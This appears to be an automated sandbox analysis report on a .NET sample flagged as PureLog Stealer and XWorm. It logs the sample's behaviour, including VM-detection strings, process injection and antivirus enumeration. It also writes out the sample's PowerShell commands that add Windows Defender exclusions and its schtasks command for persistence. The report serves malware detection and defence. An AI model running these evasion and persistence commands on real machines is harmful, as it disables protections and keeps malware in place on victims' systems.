Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Thread delayed: delay time: 922337203685477

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3722141576.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1315775861.0000000005F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: pNYyTm.exe, 0000000F.00000002.1371407979.0000000005CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1315775861.0000000005F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\pNYyTm.exe

Memory written: C:\Users\user\AppData\Roaming\pNYyTm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process created: C:\Users\user\AppData\Roaming\pNYyTm.exe "C:\Users\user\AppData\Roaming\pNYyTm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Queries volume information: C:\Users\user\AppData\Roaming\pNYyTm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Queries volume information: C:\Users\user\AppData\Roaming\pNYyTm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3722141576.0000000000C19000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.33e2d7c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.33e2d7c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1368873082.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected XWorm

Source: Yara match	File source: 19.2.pNYyTm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.34379b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.342d6d4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.34379b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
